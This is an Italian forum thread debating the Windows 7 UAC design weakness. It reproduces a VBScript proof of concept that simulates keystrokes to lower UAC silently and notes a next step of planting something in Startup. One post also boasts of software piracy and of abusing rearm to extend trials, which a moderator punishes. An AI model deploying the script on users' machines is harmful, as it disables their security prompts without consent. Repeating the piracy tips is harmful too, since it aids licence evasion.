SEMPRE USATI PIRATA I SISTEMI DI REDMOND, DAL PRIMO 98 INSTALLATO PIRATA DAL NEGOZIANTE (all'epoca era NORMA) PASSANDO AL ME, AL 2000 ALL'XP AL VISTA AL 7 (ORIGINALE QUESTO....:ASD: ALMENO PER ORA)...

recentemente ho acquisato una OEM di xp PER POCHI € (scippata da un pc arrotato ..LOL), e l'ho installata .ASSIEME A LINUX..

i sistemi che si scaricano da intenert, sono sostanzialmente le versioni UFFICIALI, rilsaciate da MS stessa...(SOPRATUTTO QUELLE IN ENG ESCONO DAI SERVER DI REDMOND ), tutto sta nel metodo di hacking (che poi con vista non è neppure necessario, QUA ms SI È PROPRIO SUPERATA...PUR DI AUMENTARE LA DIFFUSIONE)...BASTA UN BANALE REARM (procedura DETTAGLIATAMENTE DESCRITTA DA LORO STESSI)... E USARE UN SISTEMA DECISAMENTE pulito e che si scarica la qualunque dai siti MS stessi...

190 gg e si ricomincia senza INSOZZARE NULLA...

CON SEVEN SI SUPERANO ANCORA BEN 5 REARM DA SHELL SENZA FORMATTARE....E POI SI LAMENTANO DELLA PIRATERIA EH!

Ora sappiamo bene tutti che se MS attuasse delle vere politiche DI ANTIPIRATERIA, AD USARLO SAREBBERO DAVVERO 4 GATTI e sappiamo bene che il suo maggiore introito deriva dall'imposizione che attua dal boom de pc nelle grandi catene...(inizio anni 2000 le oem erano PRESSOCCHÈ SCONOSCIUTE E SI ANDAVA IN BUONA PARTE DI COPIA TAROCCA direttamente alla fonte)

altresì PERÒ sappiamo bene che in uffcio NON è ammissibile avere copie NON regolari, di qualunque sw...e sappiamo bene che un free in ambito commercile NON vale (NON Open, free che è tutt'altro...);) E QUI ms guadagna fior di €€€€€ o $$$$ in licenze win+ office...

UAC: idea brillante, implementata bene ma che ha fatto innervosire chi ASSIEME AD MS MANGIA NELLO STESSO PIATTO DEI PC ASSEMBLATI...
cHI, BEH SEMPLICE, i lecchini che producono sw per la "sicurezza"..
Chi non ricorda quando questi si sono ribellati come bambini a cui han tolto la caramella di bocca (caramella che fa rima in questo caso $$$$$) perchè i loro sw NOn servivano o andavano alla raz de gan...?

Le varie Mcafee, Norton (queste vanno a braccetto con i prodduttori di pc e con MS ossia ormai un pc senza windows e un av in versione trial, sia mai...., come se fosse un player...non lo trovi) e tante altre sw house di sicurezza...campano solo grazie a MS, alla sua capillare diffusione massificata e variegata e ad accordi lobbistici di basso fondo...;)

Cosa non recepita da tutti, me ne rendo conto.
ma da tutti non è nemmeno recepito che il sistema operativo è della Microsoft che lo dà "gentilmente" in concessione d'uso dietro corrispettivo di denaro (e la sua attività commerciale)

E non viene percepito nemmeno, se non in termini negativi, che solo Mamma e Papà sanno come è fatta la propria creatura e nessun altro.

E i vari crack che ci sono in giro o che ci saranno in giro.. non ti garantiscono proprio per niente.. ti illudi di farla franca o pensi di farla franca.. ma NON ne hai e NON ne puoi avere LA SICUREZZA.

E Mamma Microsoft in questo è stata abbastanza generosa probabilmente anche per un proprio tornaconto, ma non è detto che lo sarà altrettanto in futuro... un futuro che, almeno a parole, è già stato annunciato con VISTA.

Tutto questo perchè ho OSATO dire che l'UAC (così come apparso in Vista) si poteva implementare anche nell'XP ?
Se ci pensiamo il Linux con Security-Enhanced Linux va ben oltre: http://en.wikipedia.org/wiki/Selinux ..quello si che è ultra configurabile e serio.

P.S.
http://www.nsa.gov/research/selinux/index.shtml
Aprite gli occhi e guardate oltre l'UAC..che Microsoft non ha inventato nulla.

1. nessuno ha mai detto che Vista con UAC ha inventato un nuovo e rivoluzionario metodo di sicurezza mai apparso prima nel mondo informatico. Si parla semplicemente di ambienti Windows, o non hai notato che ti trovi in Hardware Upgrade Forum > Software > Microsoft Windows?
Non per questo mi pare corretto sminuire la sicurezza di Vista solo perché dici "già visto"...
2. sottovaluti ampiamente la capacità di sicurezza dei sistemi Windows NT che estendono con Vista e gli Integrity Levels ulteriormente il controllo minuzioso sui singoli oggetti (!!!!), e non limitatamente al FS (tutto sotto Unix è un FS come sappiamo...). Ciò permette livelli di sicurezza, a configurarli, di una finezza rara con le ACL etc. etc.... Leggi pure questa interessante discussione (soprattutto i commenti): http://aovestdipaperino.com/posts/do-you-sudowin.aspx

La falla se vogliamo non è di UAC, ma è by design di Windows purtroppo (o per fortuna di qualcuno) per via delle troppe Hooks alle DLL disponibili al programmatore.

Cioè tenete conto che per fare un keylogger ci sono parecchi modi possibili sotto Windows, poiché si hanno oltre che le chiamate di sistema, anche le DirectX.

Microsoft dovrebbe pensare seriamente a sfoltire le molte chiamate di sistema spesso pericolose.

Lo ripeto, il problema non è di UAC.

Questo è il codice in VBScript:

'// 1337H4x Written by _____________
'// (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"

E' evidente che alcune chiamate a funzione non dovrebbero essere consentite.

PS: vi consiglio di associare i file script tipo questo (.vbs) a programmi come notepad ;).

UAC: idea brillante, implementata bene ma che ha fatto innervosire chi ASSIEME AD MS MANGIA NELLO STESSO PIATTO DEI PC ASSEMBLATI...
cHI, BEH SEMPLICE, i lecchini che producono sw per la "sicurezza"..
Chi non ricorda quando questi si sono ribellati come bambini a cui han tolto la caramella di bocca (caramella che fa rima in questo caso $$$$$) perchè i loro sw NOn servivano o andavano alla raz de gan...?

Le varie Mcafee, Norton (queste vanno a braccetto con i prodduttori di pc e con MS ossia ormai un pc senza windows e un av in versione trial, sia mai...., come se fosse un player...non lo trovi) e tante altre sw house di sicurezza...campano solo grazie a MS, alla sua capillare diffusione massificata e variegata e ad accordi lobbistici di basso fondo...;)
Già.
È da debellare questa falsa idea di sicurezza che i produttori di AV falsamente instillano negli utenti! Gli AV non servono a un 8=>, o quasi, se alla base c'è un attento uso dei permessi. Peccato che in questo secondo caso è gratis e insito nel kernel di un OS quindi non ci farebbero soldi a dire la verità :Prrr:
Molto meglio far credere all'utonto che è importantissimo installare un AV e che ti protegge da ogni virus o malware, quando non è così.
Senza questa falsa campagna di sicurezza, oggi non avremmo tutta questa diffusione di malware e PC zombie che avviene tipicamente per contagio del classico XP usato da amministratore, ma con un buon AV installato (mi raccomando! :Prrr: ) e che esegue ogni tipo di crack e porcheria che circola, tanto si sente protetto...
Nessuno però critica questo atteggiamento e invece molti criticano UAC perché dà una "falsa sicurezza" secondo loro, che ipocrisia... :nono:

..
Ora sappiamo bene tutti che se MS attuasse delle vere politiche DI ANTIPIRATERIA, AD USARLO SAREBBERO DAVVERO 4 GATTI ..
..sei rimasto a concetti del 1995 (del secolo scorso).. ti consiglio di aggiornati.
Oggi saranno i 4 gatti che non utilizzeranno un sistema se non craccato e non i rimanenti 96.

E la Microsoft ha già previsto di rinunciare a 'sti quatto gatti :D ..non gli cambia niente, anzi e bene che riduca la sua quota di mercato lasciando al proprio destino la marginalità e puntando sempre di più alla qualità e in nome anche di una maggiore sicurezza dei suoi SO.

O veramente pensi che non sono capaci !?

Cmq avendo provato lo script è una cosa impressionante, aggiungo che cmq l'Active Center segnala la cosa... chiaramente in quei millisecondi un programma maligno potrebbe fare di tutto.

D'altro canto credo che in realtà sia possibile da fixare, al contrario da quanto si dice, perché basterebbe fare in modo di chiedere l'autorizzazione almeno per cambiare le impostazioni di UAC.

Cmq avendo provato lo script è una cosa impressionante...

come si fa a provare quello script !?

Cmq avendo provato lo script è una cosa impressionante, aggiungo che cmq l'Active Center segnala la cosa... chiaramente in quei millisecondi un programma maligno potrebbe fare di tutto.

D'altro canto credo che in realtà sia possibile da fixare, al contrario da quanto si dice, perché basterebbe fare in modo di chiedere l'autorizzazione almeno per cambiare le impostazioni di UAC.
Esatto. È quello che ho pensato anch'io... volete rendere il sistema più comodo per l'utonto abilitando di default il lamer-mode™ :D ? Almeno però fate in modo che ci sia un avvertimento di sistema per certe modifiche assolutamente critiche e/o lasciate l'UAC forzato per tali scelte.
Qualcuno lo suggerisca tramite i feedback per Win7.

come si fa a provare quello script !?

Qui trovi maggiori info:

http://www.withinwindows.com/2009/01/30/malware-can-turn-off-uac-in-windows-7-by-design-says-microsoft/

Questo è lo script:

http://www.withinwindows.com/files/uac/poc.vbs.txt

Per sicurezza è stato rinominato in file di testo, basta togliere l'estensione txt e diventa uno script Visual Basic.

Cmq non so se sia possibile mascherare gli input in modo tale che l'utente non se ne accorga.

Edit: aggiungo che potenzialmente un utonto anche al massimo livello di protezione potrebbe sempre inserire la password anche se gli si sono aperte le finestre da sole ;).

Tutto questo perchè ho OSATO dire che l'UAC (così come apparso in Vista) si poteva implementare anche nell'XP ?
Se ci pensiamo il Linux con Security-Enhanced Linux va ben oltre: http://en.wikipedia.org/wiki/Selinux ..quello si che è ultra configurabile e serio.

P.S.
http://www.nsa.gov/research/selinux/index.shtml
Aprite gli occhi e guardate oltre l'UAC..che Microsoft non ha inventato nulla.

Stai mettendo in mezzo 100 discorsi perchè non sai proprio dove andare a parare. Con un "ho detto una scemenza" ci facevi più bella figura.

1. nessuno ha mai detto che Vista con UAC ha inventato un nuovo e rivoluzionario metodo di sicurezza mai apparso prima nel mondo informatico. Si parla semplicemente di ambienti Windows, o non hai notato che ti trovi in Hardware Upgrade Forum > Software > Microsoft Windows?
Non per questo mi pare corretto sminuire la sicurezza di Vista solo perché dici "già visto"...
2. sottovaluti ampiamente la capacità di sicurezza dei sistemi Windows NT che estendono con Vista e gli Integrity Levels ulteriormente il controllo minuzioso sui singoli oggetti (!!!!), e non limitatamente al FS (tutto sotto Unix è un FS come sappiamo...). Ciò permette livelli di sicurezza, a configurarli, di una finezza rara con le ACL etc. etc.... Leggi pure questa interessante discussione (soprattutto i commenti): http://aovestdipaperino.com/posts/do-you-sudowin.aspx

Ma tanto è inutile... Ora ti risponderà tirando in ballo altri 3 discorsi che non c'entrano nulla. Siamo partiti che si poteva fare l'UAC su XP senza problemi con una patch e quando gli si è fatto notare che ha detto una cazzata, perchè probabilmente non conosce minimamente cosa c'è dietro l'UAC, è partito con altre 10 affermazioni che non c'entrano nulla (molte delle quali tra l'altro nessuno mette in dubbio. Chi ha detto per esempio che microsoft è pioniera nell'elevazione dei privilegi? Anzi lo sanno tutti che il mondo*nix è una vita che funziona in quel modo).

Ahh, com'è difficile per molti ammettere di aver sbagliato o semplicemente di non sapere una cosa.

Stai mettendo in mezzo 100 discorsi perchè non sai proprio dove andare a parare. Con un "ho detto una scemenza" ci facevi più bella figura.
Bella figura nei confronti di chi ?
Mica è una competizione (con tanto di premio al più esperto)..ma una discussione.
Questo sfugge a molti che frequentano i forum..fra i quali forse (e dico forse) ci sei anche tu.
Maggior relax..meno culi stretti.

Ma tanto è inutile... Ora ti risponderà tirando in ballo altri 3 discorsi che non c'entrano nulla. Siamo partiti che si poteva fare l'UAC su XP senza problemi con una patch e quando gli si è fatto notare che ha detto una cazzata, perchè probabilmente non conosce minimamente cosa c'è dietro l'UAC, è partito con altre 10 affermazioni che non c'entrano nulla.

Ahh, com'è difficile per molti ammettere di aver sbagliato o semplicemente di non sapere una cosa.
Vai pure sul personale..tranquillo eh..come fossimo fratelli.
Forza!

Cmq non so se sia possibile mascherare gli input in modo tale che l'utente non se ne accorga.
..per curiosità :p ..l'ho provato (su Se7en):

http://www.pctunerup.com/up/results/_200901/th_20090130183138_script_malevolo.jpg (http://www.pctunerup.com/up/image.php?src=_200901/20090130183138_script_malevolo.jpg)

..mi è scattato l'UAC.. al quale ovviamente ho risposto NO :ciapet:

..per curiosità :p ..l'ho provato (su Se7en):

http://www.pctunerup.com/up/results/_200901/th_20090130183138_script_malevolo.jpg (http://www.pctunerup.com/up/image.php?src=_200901/20090130183138_script_malevolo.jpg)

..mi è scattato l'UAC.. al quale ovviamente ho risposto NO :ciapet:
Lo hai settato al massimo livello..ma di default è una tacca più sotto.
Tutto lì. :D

Bella figura nei confronti di chi ?
Ma di nessuno, è un modo di dire... Non me ne viene nulla. :)

Fai un pò come credi e continua pure a pensare quello che vuoi, ci mancherebbe ;)

Certo è che i forum servono anche per imparare cose nuove e probabilmente hai perso un'occasione perchè immagino che i link che spiegano per bene le cose che "critichi" senza conoscerle non li hai neanche aperti. E poi non sto andando sul personale, sei tu che dici una cosa e poi messo alle strette non rispondi e vai per campi. Fare un'affermazione è semplice ma poi bisogna motivare. I forum sono anche questo e non serve gridare allo scandalo o alla merber war se uno ti fa notare un comportamento infantile. Mica ti sto offendendo eh... Lungi da me proprio ;)

Ho provato anche io lo script. Con l'UAC standard (al penultimo livello) in effetti funziona e lo disattiva. Portandolo all'ultimo livello (standard su Vista) ovviamente perde la sua efficacia (rispondendo no all'UAC of course).

si, l'unico problema è che ho voluto provarlo anche abbassando il livello dello UAC.. e mi ha bucato !!! :(
..ho fatto danni ?? :( .. mo che devo fa' ? ..sono diventato uno zombi ? ..c'è un controscript o è innoquo ? :cry:
:help:

si, l'unico problema è che ho voluto provarlo anche abbassando il livello dello UAC.. e mi ha bucato !!! :(
..ho fatto danni ?? :( .. mo che devo fa' ? ..sono diventato uno zombi ? ..c'è un controscript o è innoquo ? :cry:
:help:

E' un proof of concept, solo un esperimento per provare l'effettiva presenza del bug, non fa nulla di realmente dannoso ;) Sono i prossimi che usciranno a non essere proof of concept, e lì, con utenza poco informata e UAC al minimo, saranno cavoli amari...

si, l'unico problema è che ho voluto provarlo anche abbassando il livello dello UAC.. e mi ha bucato !!! :(
..ho fatto danni ?? :( .. mo che devo fa' ? ..sono diventato uno zombi ? ..c'è un controscript o è innoquo ? :cry:
:help:

No tranquillo, quello script esegue solo i comandi che vedi a schermo.

Potenzialmente potresti fare una cosa simile anche su linux con il device file collegato al mouse, ma hai bisogno dei privilegi di root per accedere al device file credo.

Di sicuro è possibile leggere le informazioni su quale tasto sia stato premuto e come si è mosso il mouse. A scrivere sul device file non ho provato.

Il punto è: siamo sicuri che anche al massimo livello l'utente non dia il consenso, e qui si ritorna sempre ai vecchi discorsi, meglio non entrarci ;).

grazie floola e WarDuck... mi stavo già agitando :)
Cmq questa mi sembra una chiara dimostrazione (e VISTA docet) che è bene prendere le buone abitudini e per chi ha VISTA di non perderle.

Ma di nessuno, è un modo di dire... Non me ne viene nulla. :)

Fai un pò come credi e continua pure a pensare quello che vuoi, ci mancherebbe ;)

Certo è che i forum servono anche per imparare cose nuove e probabilmente hai perso un'occasione perchè immagino che i link che spiegano per bene le cose che "critichi" senza conoscerle non li hai neanche aperti. E poi non sto andando sul personale, sei tu che dici una cosa e poi messo alle strette non rispondi e vai per campi. Fare un'affermazione è semplice ma poi bisogna motivare. I forum sono anche questo e non serve gridare allo scandalo o alla merber war se uno ti fa notare un comportamento infantile. Mica ti sto offendendo eh... Lungi da me proprio ;)
Ma io mica sono contro l'UAC..ma per un suo progresso..e su Windows c'è ancora tanto da fare (in configurabilità).
Così com'è la massa clicca yes senza nemmeno leggere..non si allarma e quindi diventa la solita schermata da cliccare per andare avanti.
Lo scontro si è avuto quando ho scritto che poteva essere implementato anche su XP senza rivoluzionare il sistema..apriti cielo!
Adesso mi informo meglio..lo implemento..no..non posso..non ho i sorgenti del kernel. :(
:D :D :D

grazie floola e WarDuck... mi stavo già agitando :)
Cmq questa mi sembra una chiara dimostrazione (e VISTA docet) che è bene prendere le buone abitudini e per chi ha VISTA di non perderle.
Seguendo il tuo esempio ho messo l'UAC al massimo..riavviato..ed è sparito il gadget calendario..ed inoltre non mi fa più entrare dal pannello di controllo nell'icona desktop gadgets.
Però! :D

SEMPRE USATI PIRATA I SISTEMI DI REDMOND, DAL PRIMO 98 INSTALLATO PIRATA DAL NEGOZIANTE (all'epoca era NORMA) PASSANDO AL ME, AL 2000 ALL'XP AL VISTA AL 7 (ORIGINALE QUESTO....:ASD: ALMENO PER ORA)...

recentemente ho acquisato una OEM di xp PER POCHI € (scippata da un pc arrotato ..LOL), e l'ho installata .ASSIEME A LINUX..

i sistemi che si scaricano da intenert, sono sostanzialmente le versioni UFFICIALI, rilsaciate da MS stessa...(SOPRATUTTO QUELLE IN ENG ESCONO DAI SERVER DI REDMOND ), tutto sta nel metodo di hacking (che poi con vista non è neppure necessario, QUA ms SI È PROPRIO SUPERATA...PUR DI AUMENTARE LA DIFFUSIONE)...BASTA UN BANALE REARM (procedura DETTAGLIATAMENTE DESCRITTA DA LORO STESSI)... E USARE UN SISTEMA DECISAMENTE pulito e che si scarica la qualunque dai siti MS stessi...

190 gg e si ricomincia senza INSOZZARE NULLA...

CON SEVEN SI SUPERANO ANCORA BEN 5 REARM DA SHELL SENZA FORMATTARE....E POI SI LAMENTANO DELLA PIRATERIA EH!

Ora sappiamo bene tutti che se MS attuasse delle vere politiche DI ANTIPIRATERIA, AD USARLO SAREBBERO DAVVERO 4 GATTI e sappiamo bene che il suo maggiore introito deriva dall'imposizione che attua dal boom de pc nelle grandi catene...(inizio anni 2000 le oem erano PRESSOCCHÈ SCONOSCIUTE E SI ANDAVA IN BUONA PARTE DI COPIA TAROCCA direttamente alla fonte)

altresì PERÒ sappiamo bene che in uffcio NON è ammissibile avere copie NON regolari, di qualunque sw...e sappiamo bene che un free in ambito commercile NON vale (NON Open, free che è tutt'altro...);) E QUI ms guadagna fior di €€€€€ o $$$$ in licenze win+ office...

UAC: idea brillante, implementata bene ma che ha fatto innervosire chi ASSIEME AD MS MANGIA NELLO STESSO PIATTO DEI PC ASSEMBLATI...
cHI, BEH SEMPLICE, i lecchini che producono sw per la "sicurezza"..
Chi non ricorda quando questi si sono ribellati come bambini a cui han tolto la caramella di bocca (caramella che fa rima in questo caso $$$$$) perchè i loro sw NOn servivano o andavano alla raz de gan...?

Le varie Mcafee, Norton (queste vanno a braccetto con i prodduttori di pc e con MS ossia ormai un pc senza windows e un av in versione trial, sia mai...., come se fosse un player...non lo trovi) e tante altre sw house di sicurezza...campano solo grazie a MS, alla sua capillare diffusione massificata e variegata e ad accordi lobbistici di basso fondo...;)
Regola numero 1: non si scrive maiuscolo in un forum perchè equivale a gridare. Se ti va di farlo, ben venga ma a casa tua non quando sei ospite. Chiaro?

Regola numero 2: Vantati di aver sempre usato sistemi pirata, ma non in questo forum perchè non ti è concesso.

Sospeso 5 giorni

Ma io mica sono contro l'UAC..ma per un suo progresso..e su Windows c'è ancora tanto da fare (in configurabilità).
Così com'è la massa clicca yes senza nemmeno leggere..non allarma e quindi diventa la solita schermata da cliccare per andare avanti.


Su questo si può discutere, basta vedere quanta gente ha messo la password in siti che poi gli hanno rubato l'account...

Cioè il programmatore può arrivare fino ad un certo punto, cercando di bilanciare l'invasività dei sistemi di sicurezza (sai che dice la norma per la sicurezza sul lavoro? Che ogni dispositivo di sicurezza e protezione rappresenta di per se un rischio), dopodiché interviene per forza di cose il fattore utente IMHO.


Lo scontro si è avuto quando ho scritto che poteva essere implementato anche su XP senza rivoluzionare il sistema..apriti cielo!
Adesso mi informo meglio..lo implemento..no..non posso..non ho i sorgenti del kernel. :(
:D :D :D

Beh dovresti implementare gli integrity levels e dopo UAC... nessuno sta dicendo che non fosse fattibile dal punto di vista della programmazione, ma Vista è una mayor release e non introduce solo questo nel kernel (basti pensare all'I/O con priorità).

Vista è stata l'occasione per implementarlo, non ci vedo nulla di male in questo. Poi possiamo dire anche che aggiornando il kernel di Windows 98 tiravamo fuori Vista, ma mi sembra un po' forzata come cosa, non credi?

Così com'è la massa clicca yes senza nemmeno leggere..non si allarma e quindi diventa la solita schermata da cliccare per andare avanti.
..ma tu veramente pensi che alla Microsoft dormono o fanno le cose alla cdc ?

Sui tipi di avviso, come devono essere, ci sono stati fior fiori di studi e prove (come anche sul resto):
per l'utente normale già il fatto che compare un avviso usando il computer è un problema.. tant'è che l'UAC è stato criticatissimo.. sono state fatte prove anche con avvisi più allarmanti.. ma i feedback sono stati negativi:
il problema si risolve solo educando gli utenti tutti (anche quelli che si ritengono esperti) all'uso del computer.
E in questo oggi, soprattutto in italia, e grazie alla dinsinformazione che si legge anche sui forum, monopolizzata per lo più da psedo-esperti (battaglie ideologiche, tifoserie varie) siamo tutti molto carenti.
Quella che manca è l'educazione all'uso del computer.

Infatti bisognava partire da Vic-20 -> C64 / Spectrum -> Amiga..e poi passare al PC e rimanere delusi. :D

..questo dimostra solo che sei "vecchio" :D e appartieni all'anteguerra ed ad una epoca mitica per l'informatica (cioè l'inizio).
E ho notato che di solito "i vecchi" (non tutti eh) difficilmente si aggiornano ed adeguano la loro formazione.. ma si arroccano su un passato lontano e che non è più attuale.

Essere "vecchio" oggi non è equivalente di essere preparato, attuale e proiettato al futuro... e l'informatica corre e logora molto presto :)

Ragazzi per favore basta con le scaramucce, se vogliamo parlare seriamente facciamolo altrimenti credo sia meglio astenersi dal postare.

..questo dimostra solo che sei "vecchio" :D e appartieni all'anteguerra ed ad una epoca mitica per l'informatica (cioè l'inizio).
E ho notato che di solito "i vecchi" (non tutti eh) difficilmente si aggiornano ed adeguano la loro formazione.. ma si arroccano su un passato lontano e che non è più attuale.

Essere "vecchio" oggi non è equivalente di essere preparato, attuale e proiettato al futuro... e l'informatica corre e logora molto presto :)
Io invece sono anche più avanti..penso già al Windows 8. ^_^

Io invece sono anche più avanti..penso già al Windows 8. ^_^

Quello potrebbe essere davvero altra storia... Midori... :Perfido:

Nel frattempo, manteniamoci nel presente e non litighiamo :D

Rotfl, ma ci voleva pure la news per mettere sotto gli occhi di tutti la pessima scelta di abbassare le credenziali dell'uac? È da quando è stato ufficialmente dichiarato che l'uac sarebbe stato meno invasivo che prospettao una cosa del genere xD E voi starete ancora con gli antimalware, compresa quella ciofeca di defender, paranoiati e con le prestazioni volutamente diminuite XD
Quello potrebbe essere davvero altra storia... Midori... :Perfido:

Nel frattempo, manteniamoci nel presente e non litighiamo :D

Midori è il codename di un futuro os web hosting based sotto virtualizzazzione di un server... con un probabile NT 7.0 non c'azzecca nulla xD

Midori è il codename di un futuro os web hosting based sotto virtualizzazzione di un server... con un probabile NT 7.0 non c'azzecca nulla xD

Quello è Windows Azure, ed infatti sembra deriverebbe da Midori per certi versi... Ma ho detto Midori perché vorrei vedere anche per i client qualcosa di nuovo e rivoluzionario rispetto a NT per il futuro :D

Cmq la discussione è sull'UAC, non dirottiamola...

Rotfl, ma ci voleva pure la news per mettere sotto gli occhi di tutti la pessima scelta di abbassare le credenziali dell'uac?

Non è una pessima scelta, ma una logica scelta.

La debolezza del sistema sta nel fatto che non vengono chieste credenziali al pannello di UAC stesso.

E se vogliamo aggiungere ancora, la debolezza generale di Windows è data da funzioni di libreria come dimostrato dallo script che possono emulare mouse e tastiera ed essere invocate anche con privilegi limitati.

Appunto per questo. Le basi di windows sono fatte in un certo modo, hanno vntaggi e svantaggi. In questo caso il svantaggio è che chiunque alla fine è in grado di creare un falso certificato, basta una ricerca in google e scaricare qualche tools della stessa microosft e seguire le istruzioni. Per chi sa produrre un malware scrivere un falso certificato è un gioco da ragazzi. Così come è inutile usare per lo stesso motivo driver certificati per forza sulle edizioni a 64-bit. L'importante che wsca fuori un messaggio che avverta l'utente, poi se sa quello che fa o meno sono cazzi suoi, io trovo terribilmente idiota il dover cracckare il bootloader per potere usare sempre driver certificati senza noie. E l'idiota lo sto dadno a microsoft e non a chi lo fa chiaramente. Io tengo l'uac su vista e il firewall integrato, che va più che bene, niente antimalware compreso quellamerda di defender, niente cali prestazionali dovuti ad antimalware (che ne diciate, ogni antimalware, comrpesi nod32 e avira, comportano sensibili cali prestazionali in idle e in full), scarico, navigo (compresi siti non affidabili e pieni di schifezze) e faccio quel che mi pare e l'os rimane pulito e snello. Non è questione di noie è questione di decenni di cattive abitudini imposte dalla stessa microsoft, forse in buona fede, forse per superbia, forse per mazzette della symantech e mcafee, fatto sta che ora ha rimediato da oltre 2 anni e sta solo all'utenza accendere il cervello e capire che un sistem aoperativo non è un giocattolo e va usato con criterio e che prima di modificare qualche file e directory di sistema, tantopiù il registro, si deve pensare non una ma 10 volte.

..per curiosità :p ..l'ho provato (su Se7en):

http://www.pctunerup.com/up/results/_200901/th_20090130183138_script_malevolo.jpg (http://www.pctunerup.com/up/image.php?src=_200901/20090130183138_script_malevolo.jpg)

..mi è scattato l'UAC.. al quale ovviamente ho risposto NO :ciapet:

Cmq avendo provato lo script è una cosa impressionante, aggiungo che cmq l'Active Center segnala la cosa... chiaramente in quei millisecondi un programma maligno potrebbe fare di tutto.


Io cmq non ci trovo nulla di speciale. Non serviva un mago del VBS per fare una cosa del genere ma bastava AutoHotKey (freeware), in circolazione da molti anni: http://www.autohotkey.com/ dove non servono doti di programmatore ma è molto facile genereare un exe in cui sono automatizzati degli input-event.
Semplicemente, per stare sicuri è meglio impostare l'UAC anche per i cambi di preferenze, come dico da tempo... ecco perché ho storto subito il naso alla notizia dell'UAC configurabile e, peggio, di default ad un livello più basso che in Vista.

Infatti bisognava partire da Vic-20 -> C64 / Spectrum -> Amiga..e poi passare al PC e rimanere delusi. :D

:D eh eh eh

E se vogliamo aggiungere ancora, la debolezza generale di Windows è data da funzioni di libreria come dimostrato dallo script che possono emulare mouse e tastiera ed essere invocate anche con privilegi limitati.

Non c'è niente di anormale o di poco sicuro in questo... Il problema è semplicemente by design: se non fai controlli sulle impostazioni di sistema, limitandole agli Amministratori (e su Vista di default si è amministratori con la a minuscola e ridotti privilegi come sappiamo) sarà sempre possibile. Non esistono metodi per aggirare la cosa se non eliminare completamente la gestione degli input-event o blindarli (ma in tal caso vogliamo far comparire l'UAC anche solo per emulare la pressione di un tasto? E un programma che volesse cambiare temporaneamente la funzione del tasto destro del mouse ad esempio?).

Credo che sia tranquillamente realizzabile un banale trucco del genere anche su Linux e MacOSX, che non dovrebbero neanche loro avere protezione dagli input-event, ma come Vista offrono protezione solo nel contesto in cui vengono eseguiti (da sessione utente, root etc. ereditando perciò tali diritti), non ho al momento un Linux sottomano per provare ma ne sono quasi certo... anzi dovrebbero esistere dei tool freeware per automatizzare delle macro per gli input-event, a dimostrazione...
http://www.google.it/search?num=50&hl=it&safe=off&rlz=1I7GGLL_it&q=Linux+input+macro+recorder&meta=

sarò paranoico ma per deformazione professionale (e dato che una cosa del genere me l'aspettavo), oltre ad averlo sempre tenuto al max livello lo uac su w7, gli account di vista da administrator (oltre che quelli utente) li configuro sempre tramite policy affinchè chiedano la password alla richiesta dell'uac anzichè la pressione del tasto consenti (modalità di default che considero inutile per non dire insensata)

sarò paranoico ma per deformazione professionale (e dato che una cosa del genere me l'aspettavo), oltre ad averlo sempre tenuto al max livello lo uac su w7, gli account di vista da administrator (oltre che quelli utente) li configuro sempre tramite policy affinchè chiedano la password alla richiesta dell'uac anzichè la pressione del tasto consenti (modalità di default che considero inutile per non dire insensata)

...che se non ricordo male dovrebbe essere attivabile tramite questa chiave di registro:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
ConsentPromptBehaviorAdmin REG_DWORD 0x2

(2= requester Continua, Annulla; 1= chiedi login/pass)

Non ne sono sicuro al 100% ma mi pare che esista addirittura un'opzione per fare in modo che all'UAC sia necessario premere ctrl+alt+canc (come sui vecchi NT. Solo la pressione fisica dei tasti può generare questo interrupt HW non mascherabile!) e poi digitare la password (!!). Più di così... ;)

Sono andato su:
Control Panel -> Administrative Tools -> Local Security Policy -> Local Policies -> Security Options e alla fine della lista ci sono queste chiavi:
http://img297.imageshack.us/img297/2235/capturebv8.th.jpg (http://img297.imageshack.us/my.php?image=capturebv8.jpg)

Come andrebbero settate secondo voi per avere la massima sicurezza ?

Sono andato su:
Control Panel -> Administrative Tools -> Local Security Policy -> Local Policies -> Security Options e alla fine della lista ci sono queste chiavi:
http://img297.imageshack.us/img297/2235/capturebv8.th.jpg (http://img297.imageshack.us/my.php?image=capturebv8.jpg)

Come andrebbero settate secondo voi per avere la massima sicurezza ?

Lascia tutto di default, e se vuoi puoi attivare appunto la richiesta password nel requester UAC (Prompt for credentials)...

sarò paranoico ma per deformazione professionale (e dato che una cosa del genere me l'aspettavo), oltre ad averlo sempre tenuto al max livello lo uac su w7, gli account di vista da administrator (oltre che quelli utente) li configuro sempre tramite policy affinchè chiedano la password alla richiesta dell'uac anzichè la pressione del tasto consenti (modalità di default che considero inutile per non dire insensata)

Perché inutile ed insensata?

Ecco la risposta di Microsoft
http://www.istartedsomething.com/20090131/microsoft-dismisses-windows-7-uac-security-flaw-insists-by-design/
sinceramente speravo in una risposta diversa :(

Ecco la risposta di Microsoft
http://www.istartedsomething.com/20090131/microsoft-dismisses-windows-7-uac-security-flaw-insists-by-design/
sinceramente speravo in una risposta diversa :(

Hanno ragione invece. Non è una vulnerabilità e non ci si può fare niente.
La gente impari che se vuole la sicurezza anche contro questo trucchetto triviale della macro VBS in cui si fa uso degli input-events deve alzare il livello dell'UAC.
Il cambio di preferenze per essere sicuri DEVE sempre passare attraverso il controllo dell'admin. Immagina se ti cambiano il DNS o altro e tu non ti accorgi di nulla. Mi meraviglio che si siano svegliati adesso con tutto questo falso problema gli utenti. Evidentemente pochi conoscevano già automatizzatori di input-event per creare delle macro (es. per le presentazioni...) come AutoHotKey e hanno fatto l'amara scoperta solo qualche giorno fa.

Hanno ragione invece. Non è una vulnerabilità e non ci si può fare niente.
